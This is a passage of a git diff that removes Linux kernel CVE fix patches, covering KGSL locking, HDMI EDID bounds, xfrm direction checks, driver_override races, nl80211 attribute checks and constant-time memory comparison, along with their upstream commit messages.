-+ spin_lock_irqsave(&cmdbatch->lock, flags);
- /* Print all the fences */
- list_for_each_entry(event, &cmdbatch->synclist, node) {
- if (KGSL_CMD_SYNCPOINT_TYPE_FENCE == event->type &&
- event->handle && event->handle->fence)
- kgsl_sync_fence_log(event->handle->fence);
- }
-- spin_unlock(&cmdbatch->lock);
-+ spin_unlock_irqrestore(&cmdbatch->lock, flags);
- dev_err(device->dev, "--gpu syncpoint deadlock print end--\n");
- }
- /**
-@@ -1685,15 +1686,16 @@
- struct kgsl_cmdbatch_sync_event *event)
- {
- struct kgsl_cmdbatch_sync_event *e, *tmp;
-+ unsigned long flags;
- int sched = 0;
- int removed = 0;
-
- /*
-- * We may have cmdbatch timer running, which also uses same lock,
-- * take a lock with software interrupt disabled (bh) to avoid
-- * spin lock recursion.
-+ * cmdbatch timer or event callback might run at
-+ * this time in interrupt context and uses same lock.
-+ * So use irq-save version of spin lock.
- */
-- spin_lock_bh(&event->cmdbatch->lock);
-+ spin_lock_irqsave(&event->cmdbatch->lock, flags);
-
- /*
- * sync events that are contained by a cmdbatch which has been
-@@ -1708,8 +1710,9 @@
- }
- }
-
-+ event->handle = NULL;
- sched = list_empty(&event->cmdbatch->synclist) ? 
1 : 0;
-- spin_unlock_bh(&event->cmdbatch->lock);
-+ spin_unlock_irqrestore(&event->cmdbatch->lock, flags);
-
- /* If the list is empty delete the canary timer */
- if (sched)
-@@ -1771,16 +1774,20 @@
- struct kgsl_cmdbatch_sync_event *event, *tmpsync;
- LIST_HEAD(cancel_synclist);
- int sched = 0;
-+ unsigned long flags;
-
- /* Zap the canary timer */
- del_timer_sync(&cmdbatch->timer);
-
-- /* non-bh because we just destroyed timer */
-- spin_lock(&cmdbatch->lock);
-+ /*
-+ * callback might run in interrupt context
-+ * so need to use irqsave version of spinlocks.
-+ */
-+ spin_lock_irqsave(&cmdbatch->lock, flags);
-
- /* Empty the synclist before canceling events */
- list_splice_init(&cmdbatch->synclist, &cancel_synclist);
-- spin_unlock(&cmdbatch->lock);
-+ spin_unlock_irqrestore(&cmdbatch->lock, flags);
-
- /*
- * Finish canceling events outside the cmdbatch spinlock and
-@@ -1802,8 +1809,15 @@
- kgsl_cmdbatch_sync_func, event);
- } else if (event->type == KGSL_CMD_SYNCPOINT_TYPE_FENCE) {
- /* Put events that are successfully canceled */
-- if (kgsl_sync_fence_async_cancel(event->handle))
-+ spin_lock_irqsave(&cmdbatch->lock, flags);
-+
-+ if (kgsl_sync_fence_async_cancel(event->handle)) {
-+ event->handle = NULL;
-+ spin_unlock_irqrestore(&cmdbatch->lock, flags);
- kgsl_cmdbatch_sync_event_put(event);
-+ } else {
-+ spin_unlock_irqrestore(&cmdbatch->lock, flags);
-+ }
- }
-
- /* Put events that have been removed from the synclist */
-@@ -1864,6 +1878,7 @@
- {
- struct kgsl_cmd_syncpoint_fence *sync = priv;
- struct kgsl_cmdbatch_sync_event *event;
-+ unsigned long flags;
-
- event = kzalloc(sizeof(*event), GFP_KERNEL);
-
-@@ -1892,11 +1907,6 @@
-
- kref_get(&event->refcount);
-
-- /* non-bh because, we haven't started cmdbatch timer yet */
-- spin_lock(&cmdbatch->lock);
-- list_add(&event->node, &cmdbatch->synclist);
-- spin_unlock(&cmdbatch->lock);
--
- /*
- * Increment the reference count for the async callback.
- * Decrement when the callback is successfully canceled, when -@@ -1904,6 +1914,10 @@ - */ - - kref_get(&event->refcount); -+ -+ spin_lock_irqsave(&cmdbatch->lock, flags); -+ list_add(&event->node, &cmdbatch->synclist); -+ - event->handle = kgsl_sync_fence_async_wait(sync->fd, - kgsl_cmdbatch_sync_fence_func, event); - -@@ -1911,17 +1925,14 @@ - int ret = PTR_ERR(event->handle); - - event->handle = NULL; -- -- /* Failed to add the event to the async callback */ -- kgsl_cmdbatch_sync_event_put(event); -- - /* Remove event from the synclist */ -- spin_lock(&cmdbatch->lock); - list_del(&event->node); -- spin_unlock(&cmdbatch->lock); -+ spin_unlock_irqrestore(&cmdbatch->lock, flags); -+ /* Put for event removal from the synclist */ - kgsl_cmdbatch_sync_event_put(event); -- -- /* Event no longer needed by this function */ -+ /* Unable to add event to the async callback so a put */ -+ kgsl_cmdbatch_sync_event_put(event); -+ /* Put since event no longer needed by this function */ - kgsl_cmdbatch_sync_event_put(event); - - /* -@@ -1935,6 +1946,7 @@ - } - - trace_syncpoint_fence(cmdbatch, event->handle->name); -+ spin_unlock_irqrestore(&cmdbatch->lock, flags); - - /* - * Event was successfully added to the synclist, the async diff --git a/Patches/Linux_CVEs/CVE-2017-11092/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-11092/ANY/0001.patch.base64 deleted file mode 100644 index 33270417..00000000 --- a/Patches/Linux_CVEs/CVE-2017-11092/ANY/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-11093/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-11093/3.18/0001.patch deleted file mode 100644 index c9a4bd42..00000000 --- a/Patches/Linux_CVEs/CVE-2017-11093/3.18/0001.patch +++ /dev/null 
@@ -1,35 +0,0 @@
-From 072d53b2ca00ac57ca4e0ebe2315b431256cf786 Mon Sep 17 00:00:00 2001
-From: Narender Ankam
-Date: Wed, 23 Aug 2017 15:55:50 +0530
-Subject: [PATCH] msm: mdss: hdmi: validate HDMI EDID's max number of CEA
- blocks
-
-No upper-bound validation is performed when reading number of
-extended CEA blocks from the untrusted source (EDID). Add a check
-to limit the number of CEA extension blocks.
-
-Bug: 37625232
-Change-Id: I69f09ed0ad28a4c267cf3e8f7a12efe46f75e244
-Signed-off-by: Narender Ankam
----
- drivers/video/msm/mdss/mdss_hdmi_edid.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_hdmi_edid.c b/drivers/video/msm/mdss/mdss_hdmi_edid.c
-index 36c24302658d8..5c8f52c42302c 100644
---- a/drivers/video/msm/mdss/mdss_hdmi_edid.c
-+++ b/drivers/video/msm/mdss/mdss_hdmi_edid.c
-@@ -2180,6 +2180,13 @@ int hdmi_edid_parser(void *input)
- goto bail;
- }
-
-+ /* Find out if CEA extension blocks exceeding max limit */
-+ if (num_of_cea_blocks >= MAX_EDID_BLOCKS) {
-+ DEV_WARN("%s: HDMI EDID exceeded max CEA blocks limit\n",
-+ __func__);
-+ num_of_cea_blocks = MAX_EDID_BLOCKS - 1;
-+ }
-+
- /* check for valid CEA block */
- if (edid_buf[EDID_BLOCK_SIZE] != 2) {
- DEV_ERR("%s: Invalid CEA block\n", __func__);
diff --git a/Patches/Linux_CVEs/CVE-2017-11600/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-11600/3.10/0001.patch
deleted file mode 100644
index 900cfb11..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11600/3.10/0001.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From 0af5440977299a17a0f226ce00d872572a426c14 Mon Sep 17 00:00:00 2001
-From: Suren Baghdasaryan
-Date: Tue, 15 Aug 2017 15:12:24 -0700
-Subject: [PATCH] ANDROID: check dir value of xfrm_userpolicy_id
-
-Check user provided dir value to prevent out-of-bound access
-which may occur if dir is not less than XFRM_POLICY_MAX.
-
-(url: http://seclists.org/bugtraq/2017/Jul/30)
-
-Bug: 64257838
-Signed-off-by: Suren Baghdasaryan
-Change-Id: I5bbdf95e14a61bdf5207977d9a5a4465bc848da0
----
- net/xfrm/xfrm_user.c | 18 ++++++++++++++++++
- 1 file changed, 18 insertions(+)
-
-diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
-index 3f565e495ac6..0cc105403826 100644
---- a/net/xfrm/xfrm_user.c
-+++ b/net/xfrm/xfrm_user.c
-@@ -1583,6 +1583,10 @@ static struct sk_buff *xfrm_policy_netlink(struct sk_buff *in_skb,
- struct sk_buff *skb;
- int err;
-
-+ err = verify_policy_dir(dir);
-+ if (err)
-+ return ERR_PTR(err);
-+
- skb = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
- if (!skb)
- return ERR_PTR(-ENOMEM);
-@@ -2129,6 +2133,10 @@ static int xfrm_do_migrate(struct sk_buff *skb, struct nlmsghdr *nlh,
- int err;
- int n = 0;
-
-+ err = verify_policy_dir(pi->dir);
-+ if (err)
-+ return err;
-+
- if (attrs[XFRMA_MIGRATE] == NULL)
- return -EINVAL;
-
-@@ -2243,6 +2251,11 @@ static int xfrm_send_migrate(const struct xfrm_selector *sel, u8 dir, u8 type,
- {
- struct net *net = &init_net;
- struct sk_buff *skb;
-+ int err;
-+
-+ err = verify_policy_dir(dir);
-+ if (err)
-+ return err;
-
- skb = nlmsg_new(xfrm_migrate_msgsize(num_migrate, !!k), GFP_ATOMIC);
- if (skb == NULL)
-@@ -2871,6 +2884,11 @@ static int xfrm_notify_policy_flush(const struct km_event *c)
-
- static int xfrm_send_policy_notify(struct xfrm_policy *xp, int dir, const struct km_event *c)
- {
-+ int err;
-+
-+ err = verify_policy_dir(dir);
-+ if (err)
-+ return err;
-
- switch (c->event) {
- case XFRM_MSG_NEWPOLICY:
diff --git a/Patches/Linux_CVEs/CVE-2017-11600/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-11600/3.10/0002.patch
deleted file mode 100644
index 61187e6f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11600/3.10/0002.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 7bab09631c2a303f87a7eb7e3d69e888673b9b7e Mon Sep 17 00:00:00 2001
-From: Vladis Dronov
-Date: Wed, 2 Aug 2017 19:50:14 +0200
-Subject: xfrm: policy: check policy direction value
-
-The 'dir' parameter in xfrm_migrate() is a user-controlled byte which is used
-as an array index. This can lead to an out-of-bound access, kernel lockup and
-DoS. Add a check for the 'dir' value.
-
-This fixes CVE-2017-11600.
-
-References: https://bugzilla.redhat.com/show_bug.cgi?id=1474928
-Fixes: 80c9abaabf42 ("[XFRM]: Extension for dynamic update of endpoint address(es)")
-Cc: # v2.6.21-rc1
-Reported-by: "bo Zhang"
-Signed-off-by: Vladis Dronov
-Signed-off-by: Steffen Klassert
----
- net/xfrm/xfrm_policy.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
-index ff61d85..6f5a0dad 100644
---- a/net/xfrm/xfrm_policy.c
-+++ b/net/xfrm/xfrm_policy.c
-@@ -3308,9 +3308,15 @@ int xfrm_migrate(const struct xfrm_selector *sel, u8 dir, u8 type,
- struct xfrm_state *x_new[XFRM_MAX_DEPTH];
- struct xfrm_migrate *mp;
-
-+ /* Stage 0 - sanity checks */
- if ((err = xfrm_migrate_check(m, num_migrate)) < 0)
- goto out;
-
-+ if (dir >= XFRM_POLICY_MAX) {
-+ err = -EINVAL;
-+ goto out;
-+ }
-+
- /* Stage 1 - find policy */
- if ((pol = xfrm_migrate_policy_find(sel, dir, type, net)) == NULL) {
- err = -ENOENT;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-12146/3.16+/0001.patch b/Patches/Linux_CVEs/CVE-2017-12146/3.16+/0001.patch
deleted file mode 100644
index 2ae4f16e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-12146/3.16+/0001.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From 6265539776a0810b7ce6398c27866ddb9c6bd154 Mon Sep 17 00:00:00 2001
-From: Adrian Salido
-Date: Tue, 25 Apr 2017 16:55:26 -0700
-Subject: driver core: platform: fix race condition with driver_override
-
-The driver_override implementation is susceptible to race condition when
-different threads are reading vs storing a different driver override.
-Add locking to avoid race condition.
-
-Fixes: 3d713e0e382e ("driver core: platform: add device binding path 'driver_override'")
-Cc: stable@vger.kernel.org
-Signed-off-by: Adrian Salido
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/base/platform.c | 11 +++++++++--
- 1 file changed, 9 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/base/platform.c b/drivers/base/platform.c
-index a102152..97332d0 100644
---- a/drivers/base/platform.c
-+++ b/drivers/base/platform.c
-@@ -866,7 +866,7 @@ static ssize_t driver_override_store(struct device *dev,
- const char *buf, size_t count)
- {
- struct platform_device *pdev = to_platform_device(dev);
-- char *driver_override, *old = pdev->driver_override, *cp;
-+ char *driver_override, *old, *cp;
-
- if (count > PATH_MAX)
- return -EINVAL;
-@@ -879,12 +879,15 @@ static ssize_t driver_override_store(struct device *dev,
- if (cp)
- *cp = '\0';
-
-+ device_lock(dev);
-+ old = pdev->driver_override;
- if (strlen(driver_override)) {
- pdev->driver_override = driver_override;
- } else {
- kfree(driver_override);
- pdev->driver_override = NULL;
- }
-+ device_unlock(dev);
-
- kfree(old);
-
-@@ -895,8 +898,12 @@ static ssize_t driver_override_show(struct device *dev,
- struct device_attribute *attr, char *buf)
- {
- struct platform_device *pdev = to_platform_device(dev);
-+ ssize_t len;
-
-- return sprintf(buf, "%s\n", pdev->driver_override);
-+ device_lock(dev);
-+ len = sprintf(buf, "%s\n", pdev->driver_override);
-+ device_unlock(dev);
-+ return len;
- }
- static DEVICE_ATTR_RW(driver_override);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-12153/3.2-^3.16/0001.patch b/Patches/Linux_CVEs/CVE-2017-12153/3.2-^3.16/0001.patch
deleted file mode 100644
index 4cc324ad..00000000
--- a/Patches/Linux_CVEs/CVE-2017-12153/3.2-^3.16/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 082d8a6a55d2b6583d9e93ac9796efdf4c412658 Mon Sep 17 00:00:00 2001
-From: Vladis Dronov
-Date: Wed, 13 Sep 2017 00:21:21 +0200
-Subject: nl80211: check for the required netlink attributes presence
-
-commit e785fa0a164aa11001cba931367c7f94ffaff888 upstream.
-
-nl80211_set_rekey_data() does not check if the required attributes
-NL80211_REKEY_DATA_{REPLAY_CTR,KEK,KCK} are present when processing
-NL80211_CMD_SET_REKEY_OFFLOAD request. This request can be issued by
-users with CAP_NET_ADMIN privilege and may result in NULL dereference
-and a system crash. Add a check for the required attributes presence.
-This patch is based on the patch by bo Zhang.
-
-This fixes CVE-2017-12153.
-
-References: https://bugzilla.redhat.com/show_bug.cgi?id=1491046
-Fixes: e5497d766ad ("cfg80211/nl80211: support GTK rekey offload")
-Reported-by: bo Zhang
-Signed-off-by: Vladis Dronov
-Signed-off-by: Johannes Berg
-Signed-off-by: Ben Hutchings
----
- net/wireless/nl80211.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
-index 19a3c87..41a0ebb 100644
---- a/net/wireless/nl80211.c
-+++ b/net/wireless/nl80211.c
-@@ -5823,6 +5823,9 @@ static int nl80211_set_rekey_data(struct sk_buff *skb, struct genl_info *info)
- if (err)
- return err;
-
-+ if (!tb[NL80211_REKEY_DATA_REPLAY_CTR] || !tb[NL80211_REKEY_DATA_KEK] ||
-+ !tb[NL80211_REKEY_DATA_KCK])
-+ return -EINVAL;
- if (nla_len(tb[NL80211_REKEY_DATA_REPLAY_CTR]) != NL80211_REPLAY_CTR_LEN)
- return -ERANGE;
- if (nla_len(tb[NL80211_REKEY_DATA_KEK]) != NL80211_KEK_LEN)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0001.patch
deleted file mode 100644
index f5f18700..00000000
--- a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0001.patch
+++ /dev/null
@@ -1,371 +0,0 @@ -From 6fef7504fdb639dea2fbc0cbbd10963953f443da Mon Sep 17 00:00:00 2001 -From: James Yonan -Date: Thu, 26 Sep 2013 02:20:39 -0600 -Subject: [PATCH] crypto: crypto_memneq - add equality testing of memory - regions w/o timing leaks - -When comparing MAC hashes, AEAD authentication tags, or other hash -values in the context of authentication or integrity checking, it -is important not to leak timing information to a potential attacker, -i.e. when communication happens over a network. - -Bytewise memory comparisons (such as memcmp) are usually optimized so -that they return a nonzero value as soon as a mismatch is found. E.g, -on x86_64/i5 for 512 bytes this can be ~50 cyc for a full mismatch -and up to ~850 cyc for a full match (cold). This early-return behavior -can leak timing information as a side channel, allowing an attacker to -iteratively guess the correct result. - -This patch adds a new method crypto_memneq ("memory not equal to each -other") to the crypto API that compares memory areas of the same length -in roughly "constant time" (cache misses could change the timing, but -since they don't reveal information about the content of the strings -being compared, they are effectively benign). Iow, best and worst case -behaviour take the same amount of time to complete (in contrast to -memcmp). - -Note that crypto_memneq (unlike memcmp) can only be used to test for -equality or inequality, NOT for lexicographical order. This, however, -is not an issue for its use-cases within the crypto API. - -We tried to locate all of the places in the crypto API where memcmp was -being used for authentication or integrity checking, and convert them -over to crypto_memneq. 
- -crypto_memneq is declared noinline, placed in its own source file, -and compiled with optimizations that might increase code size disabled -("Os") because a smart compiler (or LTO) might notice that the return -value is always compared against zero/nonzero, and might then -reintroduce the same early-return optimization that we are trying to -avoid. - -Using #pragma or __attribute__ optimization annotations of the code -for disabling optimization was avoided as it seems to be considered -broken or unmaintained for long time in GCC [1]. Therefore, we work -around that by specifying the compile flag for memneq.o directly in -the Makefile. We found that this seems to be most appropriate. - -As we use ("Os"), this patch also provides a loop-free "fast-path" for -frequently used 16 byte digests. Similarly to kernel library string -functions, leave an option for future even further optimized architecture -specific assembler implementations. - -This was a joint work of James Yonan and Daniel Borkmann. Also thanks -for feedback from Florian Weimer on this and earlier proposals [2]. 
- - [1] http://gcc.gnu.org/ml/gcc/2012-07/msg00211.html - [2] https://lkml.org/lkml/2013/2/10/131 - -Change-Id: Ib2f5b485e28bd274b6d26b945e91acdf3bec8674 -Signed-off-by: James Yonan -Signed-off-by: Daniel Borkmann -Cc: Florian Weimer -Signed-off-by: Herbert Xu ---- - crypto/Makefile | 7 ++- - crypto/authenc.c | 6 +-- - crypto/authencesn.c | 8 +-- - crypto/ccm.c | 4 +- - crypto/gcm.c | 2 +- - crypto/memneq.c | 139 ++++++++++++++++++++++++++++++++++++++++++++++++ - include/crypto/algapi.h | 18 ++++++- - 7 files changed, 172 insertions(+), 12 deletions(-) - create mode 100644 crypto/memneq.c - -diff --git a/crypto/Makefile b/crypto/Makefile -index 30f33d67533..ae3684d16f3 100644 ---- a/crypto/Makefile -+++ b/crypto/Makefile -@@ -2,8 +2,13 @@ - # Cryptographic API - # - -+# memneq MUST be built with -Os or -O0 to prevent early-return optimizations -+# that will defeat memneq's actual purpose to prevent timing attacks. -+CFLAGS_REMOVE_memneq.o := -O1 -O2 -O3 -+CFLAGS_memneq.o := -Os -+ - obj-$(CONFIG_CRYPTO) += crypto.o --crypto-y := api.o cipher.o compress.o -+crypto-y := api.o cipher.o compress.o memneq.o - - obj-$(CONFIG_CRYPTO_WORKQUEUE) += crypto_wq.o - -diff --git a/crypto/authenc.c b/crypto/authenc.c -index 5ef7ba6b6a7..5ea49b331a7 100644 ---- a/crypto/authenc.c -+++ b/crypto/authenc.c -@@ -188,7 +188,7 @@ static void authenc_verify_ahash_update_done(struct crypto_async_request *areq, - scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen, - authsize, 0); - -- err = memcmp(ihash, ahreq->result, authsize) ? -EBADMSG : 0; -+ err = crypto_memneq(ihash, ahreq->result, authsize) ? -EBADMSG : 0; - if (err) - goto out; - -@@ -227,7 +227,7 @@ static void authenc_verify_ahash_done(struct crypto_async_request *areq, - scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen, - authsize, 0); - -- err = memcmp(ihash, ahreq->result, authsize) ? -EBADMSG : 0; -+ err = crypto_memneq(ihash, ahreq->result, authsize) ? 
-EBADMSG : 0; - if (err) - goto out; - -@@ -462,7 +462,7 @@ static int crypto_authenc_verify(struct aead_request *req, - ihash = ohash + authsize; - scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen, - authsize, 0); -- return memcmp(ihash, ohash, authsize) ? -EBADMSG : 0; -+ return crypto_memneq(ihash, ohash, authsize) ? -EBADMSG : 0; - } - - static int crypto_authenc_iverify(struct aead_request *req, u8 *iv, -diff --git a/crypto/authencesn.c b/crypto/authencesn.c -index 136b68b9d8d..9f9a03c0c27 100644 ---- a/crypto/authencesn.c -+++ b/crypto/authencesn.c -@@ -247,7 +247,7 @@ static void authenc_esn_verify_ahash_update_done(struct crypto_async_request *ar - scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen, - authsize, 0); - -- err = memcmp(ihash, ahreq->result, authsize) ? -EBADMSG : 0; -+ err = crypto_memneq(ihash, ahreq->result, authsize) ? -EBADMSG : 0; - if (err) - goto out; - -@@ -296,7 +296,7 @@ static void authenc_esn_verify_ahash_update_done2(struct crypto_async_request *a - scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen, - authsize, 0); - -- err = memcmp(ihash, ahreq->result, authsize) ? -EBADMSG : 0; -+ err = crypto_memneq(ihash, ahreq->result, authsize) ? -EBADMSG : 0; - if (err) - goto out; - -@@ -336,7 +336,7 @@ static void authenc_esn_verify_ahash_done(struct crypto_async_request *areq, - scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen, - authsize, 0); - -- err = memcmp(ihash, ahreq->result, authsize) ? -EBADMSG : 0; -+ err = crypto_memneq(ihash, ahreq->result, authsize) ? -EBADMSG : 0; - if (err) - goto out; - -@@ -568,7 +568,7 @@ static int crypto_authenc_esn_verify(struct aead_request *req) - ihash = ohash + authsize; - scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen, - authsize, 0); -- return memcmp(ihash, ohash, authsize) ? -EBADMSG : 0; -+ return crypto_memneq(ihash, ohash, authsize) ? 
-EBADMSG : 0; - } - - static int crypto_authenc_esn_iverify(struct aead_request *req, u8 *iv, -diff --git a/crypto/ccm.c b/crypto/ccm.c -index 32fe1bb5dec..44fbe81ff2c 100644 ---- a/crypto/ccm.c -+++ b/crypto/ccm.c -@@ -363,7 +363,7 @@ static void crypto_ccm_decrypt_done(struct crypto_async_request *areq, - - if (!err) { - err = crypto_ccm_auth(req, req->dst, cryptlen); -- if (!err && memcmp(pctx->auth_tag, pctx->odata, authsize)) -+ if (!err && crypto_memneq(pctx->auth_tag, pctx->odata, authsize)) - err = -EBADMSG; - } - aead_request_complete(req, err); -@@ -422,7 +422,7 @@ static int crypto_ccm_decrypt(struct aead_request *req) - return err; - - /* verify */ -- if (memcmp(authtag, odata, authsize)) -+ if (crypto_memneq(authtag, odata, authsize)) - return -EBADMSG; - - return err; -diff --git a/crypto/gcm.c b/crypto/gcm.c -index 1a252639ef9..57153f9a1c2 100644 ---- a/crypto/gcm.c -+++ b/crypto/gcm.c -@@ -575,7 +575,7 @@ static int crypto_gcm_verify(struct aead_request *req, - - crypto_xor(auth_tag, iauth_tag, 16); - scatterwalk_map_and_copy(iauth_tag, req->src, cryptlen, authsize, 0); -- return memcmp(iauth_tag, auth_tag, authsize) ? -EBADMSG : 0; -+ return crypto_memneq(iauth_tag, auth_tag, authsize) ? -EBADMSG : 0; - } - - static void gcm_decrypt_done(struct crypto_async_request *areq, int err) -diff --git a/crypto/memneq.c b/crypto/memneq.c -new file mode 100644 -index 00000000000..40dfa50d39b ---- /dev/null -+++ b/crypto/memneq.c -@@ -0,0 +1,139 @@ -+/* -+ * Constant-time equality testing of memory regions. -+ * -+ * Authors: -+ * -+ * James Yonan -+ * Daniel Borkmann -+ * -+ * This file is provided under a dual BSD/GPLv2 license. When using or -+ * redistributing this file, you may do so under either license. -+ * -+ * GPL LICENSE SUMMARY -+ * -+ * Copyright(c) 2013 OpenVPN Technologies, Inc. All rights reserved. 
-+ * -+ * This program is free software; you can redistribute it and/or modify -+ * it under the terms of version 2 of the GNU General Public License as -+ * published by the Free Software Foundation. -+ * -+ * This program is distributed in the hope that it will be useful, but -+ * WITHOUT ANY WARRANTY; without even the implied warranty of -+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -+ * General Public License for more details. -+ * -+ * You should have received a copy of the GNU General Public License -+ * along with this program; if not, write to the Free Software -+ * Foundation, Inc., 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA. -+ * The full GNU General Public License is included in this distribution -+ * in the file called LICENSE.GPL. -+ * -+ * BSD LICENSE -+ * -+ * Copyright(c) 2013 OpenVPN Technologies, Inc. All rights reserved. -+ * -+ * Redistribution and use in source and binary forms, with or without -+ * modification, are permitted provided that the following conditions -+ * are met: -+ * -+ * * Redistributions of source code must retain the above copyright -+ * notice, this list of conditions and the following disclaimer. -+ * * Redistributions in binary form must reproduce the above copyright -+ * notice, this list of conditions and the following disclaimer in -+ * the documentation and/or other materials provided with the -+ * distribution. -+ * * Neither the name of OpenVPN Technologies nor the names of its -+ * contributors may be used to endorse or promote products derived -+ * from this software without specific prior written permission. -+ * -+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -+ * A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT -+ * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -+ * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -+ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -+ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -+ * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -+ */ -+ -+#include -+#include -+ -+#ifndef __HAVE_ARCH_CRYPTO_MEMNEQ -+ -+/* Generic path for arbitrary size */ -+static inline unsigned long -+__crypto_memneq_generic(const void *a, const void *b, size_t size) -+{ -+ unsigned long neq = 0; -+ -+#if defined(CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS) -+ while (size >= sizeof(unsigned long)) { -+ neq |= *(unsigned long *)a ^ *(unsigned long *)b; -+ a += sizeof(unsigned long); -+ b += sizeof(unsigned long); -+ size -= sizeof(unsigned long); -+ } -+#endif /* CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS */ -+ while (size > 0) { -+ neq |= *(unsigned char *)a ^ *(unsigned char *)b; -+ a += 1; -+ b += 1; -+ size -= 1; -+ } -+ return neq; -+} -+ -+/* Loop-free fast-path for frequently used 16-byte size */ -+static inline unsigned long __crypto_memneq_16(const void *a, const void *b) -+{ -+#ifdef CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS -+ if (sizeof(unsigned long) == 8) -+ return ((*(unsigned long *)(a) ^ *(unsigned long *)(b)) -+ | (*(unsigned long *)(a+8) ^ *(unsigned long *)(b+8))); -+ else if (sizeof(unsigned int) == 4) -+ return ((*(unsigned int *)(a) ^ *(unsigned int *)(b)) -+ | (*(unsigned int *)(a+4) ^ *(unsigned int *)(b+4)) -+ | (*(unsigned int *)(a+8) ^ *(unsigned int *)(b+8)) -+ | (*(unsigned int *)(a+12) ^ *(unsigned int *)(b+12))); -+ else -+#endif /* CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS */ -+ return ((*(unsigned char *)(a) ^ *(unsigned char *)(b)) -+ | (*(unsigned char *)(a+1) ^ 
*(unsigned char *)(b+1)) -+ | (*(unsigned char *)(a+2) ^ *(unsigned char *)(b+2)) -+ | (*(unsigned char *)(a+3) ^ *(unsigned char *)(b+3)) -+ | (*(unsigned char *)(a+4) ^ *(unsigned char *)(b+4)) -+ | (*(unsigned char *)(a+5) ^ *(unsigned char *)(b+5)) -+ | (*(unsigned char *)(a+6) ^ *(unsigned char *)(b+6)) -+ | (*(unsigned char *)(a+7) ^ *(unsigned char *)(b+7)) -+ | (*(unsigned char *)(a+8) ^ *(unsigned char *)(b+8)) -+ | (*(unsigned char *)(a+9) ^ *(unsigned char *)(b+9)) -+ | (*(unsigned char *)(a+10) ^ *(unsigned char *)(b+10)) -+ | (*(unsigned char *)(a+11) ^ *(unsigned char *)(b+11)) -+ | (*(unsigned char *)(a+12) ^ *(unsigned char *)(b+12)) -+ | (*(unsigned char *)(a+13) ^ *(unsigned char *)(b+13)) -+ | (*(unsigned char *)(a+14) ^ *(unsigned char *)(b+14)) -+ | (*(unsigned char *)(a+15) ^ *(unsigned char *)(b+15))); -+} -+ -+/* Compare two areas of memory without leaking timing information, -+ * and with special optimizations for common sizes. Users should -+ * not call this function directly, but should instead use -+ * crypto_memneq defined in crypto/algapi.h. -+ */ -+noinline unsigned long __crypto_memneq(const void *a, const void *b, -+ size_t size) -+{ -+ switch (size) { -+ case 16: -+ return __crypto_memneq_16(a, b); -+ default: -+ return __crypto_memneq_generic(a, b, size); -+ } -+} -+EXPORT_SYMBOL(__crypto_memneq); -+ -+#endif /* __HAVE_ARCH_CRYPTO_MEMNEQ */ -diff --git a/include/crypto/algapi.h b/include/crypto/algapi.h -index 418d270e180..e73c19e90e3 100644 ---- a/include/crypto/algapi.h -+++ b/include/crypto/algapi.h -@@ -386,5 +386,21 @@ static inline int crypto_requires_sync(u32 type, u32 mask) - return (type ^ CRYPTO_ALG_ASYNC) & mask & 